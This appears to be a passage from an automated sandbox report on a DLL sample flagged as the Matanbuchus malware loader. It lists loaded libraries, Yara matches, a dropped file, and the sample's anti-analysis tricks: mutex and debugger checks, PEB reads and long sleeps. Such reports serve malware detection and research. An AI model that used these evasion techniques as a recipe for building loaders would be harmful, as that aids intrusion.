                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: file.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Yara detected Matanbuchus
                    Source: Yara matchFile source: file.dll, type: SAMPLE
                    Source: Yara matchFile source: 29.2.regsvr32.exe.6c3f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.6c3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.6cc50000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.6cc50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.6cc50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.regsvr32.exe.6c3f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.rundll32.exe.6cc50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.4c30000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.4c30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2210377846.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\8f08\user-PC\user-PC.winmd, type: DROPPED
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4DD76 push ecx; ret 3_2_7EF4DD89
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF787BD push esi; ret 3_2_7EF787C6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABDD76 push ecx; ret 5_2_7FABDD89
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAE87BD push esi; ret 5_2_7FAE87C6
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07DD76 push ecx; ret 9_2_7F07DD89
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\user-PC\user-PC.winmdJump to dropped file
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\user-PC\user-PC.winmdJump to dropped file
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-34178
                    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-43684
                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_5-44142
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.winmdJump to dropped file
                    Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.4 %
                    Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.4 %
                    Source: C:\Windows\SysWOW64\rundll32.exe TID: 5704Thread sleep count: 87 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exe TID: 5704Thread sleep time: -11310000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF64932 FindFirstFileExW,3_2_7EF64932
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD4932 FindFirstFileExW,5_2_7FAD4932
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F094932 FindFirstFileExW,9_2_7F094932
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA83B0 GetSystemInfo,5_2_7FAA83B0
                    Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
                    Source: regsvr32.exe, 0000001B.00000003.2798870432.0000000004EBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seMIuMU8vNI7XcEblccUgqXTLHVMci+pcwt5P1yCoz9Mccccjk4NRvgJgeEAuMUg
                    Source: regsvr32.exe, 0000001B.00000003.2798870432.0000000004EBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GdKGzqRWJxvQJ7GPC4lLWWpNjguBAJ8vvMCINL7BrAi7YLcJrTOLDbspihycTOmm
                    Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-44232
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF51F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_7EF51F06
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC69C40 mov eax, dword ptr fs:[00000030h]3_2_6CC69C40
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4AFE0 mov edx, dword ptr fs:[00000030h]3_2_7EF4AFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4AFE0 mov eax, dword ptr fs:[00000030h]3_2_7EF4AFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF22A30 mov edx, dword ptr fs:[00000030h]3_2_7EF22A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF22A30 mov ecx, dword ptr fs:[00000030h]3_2_7EF22A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF22A30 mov eax, dword ptr fs:[00000030h]3_2_7EF22A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF22A30 mov edx, dword ptr fs:[00000030h]3_2_7EF22A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF35F00 mov ecx, dword ptr fs:[00000030h]3_2_7EF35F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF21CA0 mov eax, dword ptr fs:[00000030h]3_2_7EF21CA0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3BC90 mov ecx, dword ptr fs:[00000030h]3_2_7EF3BC90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF37B60 mov ecx, dword ptr fs:[00000030h]3_2_7EF37B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF37B60 mov eax, dword ptr fs:[00000030h]3_2_7EF37B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF37B60 mov ecx, dword ptr fs:[00000030h]3_2_7EF37B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov eax, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov edx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov eax, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov edx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov edx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF458E0 mov edx, dword ptr fs:[00000030h]3_2_7EF458E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov eax, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov eax, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov ecx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF41890 mov edx, dword ptr fs:[00000030h]3_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3B9A0 mov eax, dword ptr fs:[00000030h]3_2_7EF3B9A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF216A0 mov edx, dword ptr fs:[00000030h]3_2_7EF216A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF216A0 mov eax, dword ptr fs:[00000030h]3_2_7EF216A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov edx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov edx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov edx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov eax, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov edx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov ecx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov ecx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov ecx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF27630 mov edx, dword ptr fs:[00000030h]3_2_7EF27630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3B7C0 mov edx, dword ptr fs:[00000030h]3_2_7EF3B7C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3B7B0 mov eax, dword ptr fs:[00000030h]3_2_7EF3B7B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF39770 mov eax, dword ptr fs:[00000030h]3_2_7EF39770
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1D700 mov eax, dword ptr fs:[00000030h]3_2_7EF1D700
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF19480 mov edx, dword ptr fs:[00000030h]3_2_7EF19480
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF17450 mov edx, dword ptr fs:[00000030h]3_2_7EF17450
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF5D438 mov ecx, dword ptr fs:[00000030h]3_2_7EF5D438
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1D3B0 mov edx, dword ptr fs:[00000030h]3_2_7EF1D3B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF37090 mov eax, dword ptr fs:[00000030h]3_2_7EF37090
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1709A mov eax, dword ptr fs:[00000030h]3_2_7EF1709A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov ecx, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov ecx, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF29020 mov eax, dword ptr fs:[00000030h]3_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF17000 mov eax, dword ptr fs:[00000030h]3_2_7EF17000
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF16DF0 mov edx, dword ptr fs:[00000030h]3_2_7EF16DF0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF46D80 mov edx, dword ptr fs:[00000030h]3_2_7EF46D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF46D80 mov ecx, dword ptr fs:[00000030h]3_2_7EF46D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF46D80 mov ecx, dword ptr fs:[00000030h]3_2_7EF46D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF46D80 mov ecx, dword ptr fs:[00000030h]3_2_7EF46D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF46D80 mov edx, dword ptr fs:[00000030h]3_2_7EF46D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF18B90 mov edx, dword ptr fs:[00000030h]3_2_7EF18B90
